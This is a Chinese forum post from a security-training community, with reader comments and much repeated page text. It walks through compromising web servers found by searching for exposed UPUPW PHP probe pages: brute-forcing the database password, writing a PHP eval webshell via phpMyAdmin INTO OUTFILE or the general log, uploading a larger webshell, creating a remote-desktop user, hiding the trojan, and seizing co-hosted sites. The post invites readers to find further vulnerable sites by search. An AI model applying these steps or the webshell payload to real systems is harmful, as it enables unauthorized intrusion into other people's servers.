项目实战 - 看我如何获得权限进入目标桌面- Track 知识社区 - 掌控安全在线教育

前言

我今天授权项目上遇到了一个站点，然后成功拿下服务器，我联想到了是否可以通过谷歌与法寻找到更多存在这样问题的网站，然后我简单的一搜索发现有很多，在这里我将分享这次项目的实战过程和经验。

在这里声明一下，大家无论做什么都要遵守中华人民共和国网络安全法，在没有得到授权的情况下是不能这样渗透的

一. 信息收集

这里的信息收集比较简单，并不需要繁琐的域名 whois 和端口扫描。
我们也不需要费尽心思的去寻找”谷歌镜像站”
跟着我打开”www.baidu.com”在其中输入——“PHP探针-UPUPW绿色服务器平台”相关字眼
搜索结果如下：

然后我们随机打开一个网页，页面呈现给我们的内容如下[这里的截图是项目上的网站的内容截图，你们百度找到的也是一样的]：

我们发现该网站底部有的数据库交互功能！

显然它已经告诉我们该网站的数据库账号那我们是不是只要爆破出其密码就可以呢（ps：这样的页面通常是没有拦截访问限制的，所以大家可以提高线程去爆破大字典）

此处成功爆破出数据库密码，并且登录成功。[SRC挖掘到这一步就可以提交了，没有授权的话不要去做后面的操作]

二.进入数据库植入木马

我们在进入数据库之前呢需要将 “当前网站目录”记住(最好记在txt文本里)

然后点击下方的phpMyadmin 进入登录页面输入账号密码后进入数据库内部

登录后测试一下SQL语句是否可执行

当我们得知SQL语句可执行后那么我们就要写小马了

select '<?php @eval($_REQUEST[a]);?>'
into outfile "网站根目录//xiaoma.php"

执行成功后看一下能否访问我们的小马

三.菜刀链接

至此我们已经拿到该网站的webshell

但是，后来我感觉这是一个游戏网站，类似于是兄弟就来砍我的那种网游服务器因为域名就是传奇XX，后来发现不是这个样子的hhh

这其实就可以搞一搞了说不定能白嫖免费的服务器用呢

四.大马维持权限

我想用菜刀浏览一下其他目录里面的文件去给我提示”执行成功，但是发生错误”
一开始我以为是菜刀生锈了，后来发现原因可能并不是这样。
既然连接上菜刀那么我就可以上传大马
我从网上随便下了一个大马.py
将其修改为dama.php格式，并查看大马的源码将连接密码修改为”123456”
再修改大马的编码格式：改为utf-8 //之前编码格式为gbk存在乱码现象//。

将大马上传至菜刀

连接大马

连接成功

连接成功后依旧没法进行目录的跳转!!!

所以要想遍历C盘全目录我们还需另寻他法。

五.山重水复疑无路，柳暗花明又一村

我们用大马扫描一下目标服务器开放的端口

注意：这是在内网进行的端口扫描，所以可以绕过防火墙的拦截，扫描出隐藏端口

我们通过端口扫描发现突破口：135，3389端口

135
远程过程调用
3389：
远程桌面连接

不多BB，直接net user一条龙服务走一波。

创建用户：

查看权限为system 直接省略提权过程（是不是很舒服）

远程连接：

拒绝访问，但我感觉应该是用户权限问题

所以我们对AnJian用户进行提权

再次连接：

好吧明显是台充当服务的虚拟机，然后我们再遍历C盘目录。

小宝贝儿看你还顽不顽皮

木马隐藏：

虽然被隐藏但是可以通过杀软扫描出来

那也无所谓啊谁会在虚拟机安装杀软？

IP反查：

通过ip138.com对该IP进行反查，查询其注册过的站点

这样我们我们同时拿到3个站点的webshell //其中两个站点挂掉了

拓展一：

我们通过ipconfig -all 和 arp -a 进行探测获取网关地址实施ARP欺骗

后面的就是编写ARP欺骗脚本的内容了如果大家感兴趣我也可以写一篇有关如何编写ARP欺骗脚本的文章给你们学习哦~

补充：

phpmyadmin通过日志拿webshell

经老师指点，上述方法容易出ERROR1290的错误(是文件导出做了限制。所以在配置中修改限制信息)。

说白了就是不让导出文件，高版本mysql需要修改my.ini才可以利用

所以为了稳妥起见，我们可以用修改日志的方法进行webshell。

下面是我参考别人文章

条件：ROOT权限

进入phpmyadmin后先要把general log设置为ON。

然后将文件修改日志文件名修改，修改成可被容器解析的php文件。

这里他是将日志文件名称修改为def2.php，并且把路径改为网站根目录

然后随便执行一条sql语句。就比如SELECT一个小马。

这样<?php @eval($_REQUEST[a]);?>就被记录在日志中了，而日志又是可被解析PHP文件，所以日志就成了一个小马了

菜刀连接：

本次渗透测试到此就告一段路了，谢谢大家观看如果觉得不错请点个赞再走吧~

用户名	金币	时间	理由
奖励系统	100.00	2020-08-01 10:10:27	投稿满 10 赞奖励
奖励系统	50.00	2020-07-31 08:08:07	投稿满 5 赞奖励
Track-聂风	150.00	2020-07-30 15:03:34	支持同学继续发文

8 Reply | Until 2020-10-14 | 1501 View

Track-聂风
发表于 2020-7-30

啥时候有空记得把上一篇的采集代理服务器的文章补充完整

评论列表

加载数据中...

编写评论内容

kidll
发表于 2020-7-30

大佬牛逼

zhangjialu
发表于 2020-7-30

真香~

wl1358042098
发表于 2020-7-31

打卡——>获得权限进入目标桌面

xiaoc
发表于 2020-8-1

加油

tc
发表于 2020-8-1

@楼主，这种漏洞是怎么造成的，是因为PHP探针的问题吗，是不是只要PHP探针删掉就可以防止出现这个漏洞了

杜小孙
发表于 2020-8-2

牛逼哄哄

第十期-五班-空白
发表于 2020-10-14

这个探针怎么使用呀

项目实战 - 看我如何获得权限进入目标桌面

前言

一. 信息收集

搜索结果如下：

然后我们随机打开一个网页，页面呈现给我们的内容如下[这里的截图是项目上的网站的内容截图，你们百度找到的也是一样的]：

我们发现该网站底部有的数据库交互功能！

显然 它已经告诉我们该网站的数据库账号 那我们是不是只要爆破出其密码就可以呢（ps：这样的页面通常是没有拦截访问限制的，所以大家可以提高线程去爆破大字典）

此处成功爆破出数据库密码，并且登录成功。[SRC挖掘到这一步就可以提交了，没有授权的话不要去做后面的操作]

二.进入数据库 植入木马

我们在进入数据库之前呢需要将 “当前网站目录”记住(最好记在txt文本里)

然后点击下方的phpMyadmin 进入登录页面 输入账号密码后进入数据库内部

登录后测试一下SQL语句是否可执行

当我们得知SQL语句可执行后 那么我们就要写小马了

执行成功后看一下能否访问我们的小马

三.菜刀链接

至此我们已经拿到该网站的webshell

但是，后来我感觉这是一个游戏网站，类似于是兄弟就来砍我的那种网游服务器 因为域名就是传奇XX，后来发现不是这个样子的hhh

这其实就可以搞一搞了 说不定能白嫖免费的服务器用呢

四.大马维持权限

将大马上传至菜刀

连接大马

连接成功

连接成功后依旧没法 进行目录的跳转!!!

所以要想遍历C盘全目录我们还需另寻他法。

五.山重水复疑无路，柳暗花明又一村

我们用大马扫描一下目标服务器开放的端口

注意：这是在内网进行的端口扫描，所以可以绕过防火墙的拦截，扫描出隐藏端口

我们通过端口扫描发现突破口：135，3389端口

不多BB，直接net user一条龙服务走一波。

创建用户：

远程连接：

拒绝访问，但我感觉应该是用户权限问题

所以我们对AnJian用户进行提权

再次连接：

好吧 明显是台充当服务的虚拟机，然后我们再遍历C盘目录。

小宝贝儿 看你还顽不顽皮

木马隐藏：

虽然被隐藏 但是可以通过杀软扫描出来

那也无所谓啊 谁会在虚拟机安装杀软？

IP反查：

通过ip138.com对该IP进行反查，查询其注册过的站点

这样我们我们同时拿到3个站点的webshell //其中两个站点挂掉了

拓展一：

我们通过ipconfig -all 和 arp -a 进行探测 获取网关地址 实施ARP欺骗

后面的就是编写ARP欺骗脚本的内容了 如果大家感兴趣 我也可以写一篇有关如何编写ARP欺骗脚本的文章给你们学习哦~

补充：

phpmyadmin通过日志拿webshell

经老师指点，上述方法容易出ERROR1290的错误(是文件导出做了限制。所以在配置中修改限制信息)。

说白了就是不让导出文件，高版本mysql需要修改my.ini才可以利用

所以为了稳妥起见，我们可以用修改日志的方法进行webshell。

下面是我参考别人文章

条件：ROOT权限

进入phpmyadmin后先要把general log设置为ON。

然后将文件修改日志文件名修改，修改成可被容器解析的php文件。

这里他是将日志文件名称修改为def2.php，并且把路径改为网站根目录

然后随便执行一条sql语句。就比如SELECT一个小马。

这样<?php @eval($_REQUEST[a]);?>就被记录在日志中了，而日志又是可被解析PHP文件，所以日志就成了一个小马了

菜刀连接：

本次渗透测试到此就告一段路了，谢谢大家观看 如果觉得不错 请点个赞再走吧~

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

显然它已经告诉我们该网站的数据库账号那我们是不是只要爆破出其密码就可以呢（ps：这样的页面通常是没有拦截访问限制的，所以大家可以提高线程去爆破大字典）

二.进入数据库植入木马

然后点击下方的phpMyadmin 进入登录页面输入账号密码后进入数据库内部

当我们得知SQL语句可执行后那么我们就要写小马了

但是，后来我感觉这是一个游戏网站，类似于是兄弟就来砍我的那种网游服务器因为域名就是传奇XX，后来发现不是这个样子的hhh

这其实就可以搞一搞了说不定能白嫖免费的服务器用呢

连接成功后依旧没法进行目录的跳转!!!

好吧明显是台充当服务的虚拟机，然后我们再遍历C盘目录。

小宝贝儿看你还顽不顽皮

虽然被隐藏但是可以通过杀软扫描出来

那也无所谓啊谁会在虚拟机安装杀软？

我们通过ipconfig -all 和 arp -a 进行探测获取网关地址实施ARP欺骗

后面的就是编写ARP欺骗脚本的内容了如果大家感兴趣我也可以写一篇有关如何编写ARP欺骗脚本的文章给你们学习哦~

本次渗透测试到此就告一段路了，谢谢大家观看如果觉得不错请点个赞再走吧~

评论列表

评论列表

评论列表

评论列表

评论列表

评论列表

评论列表

评论列表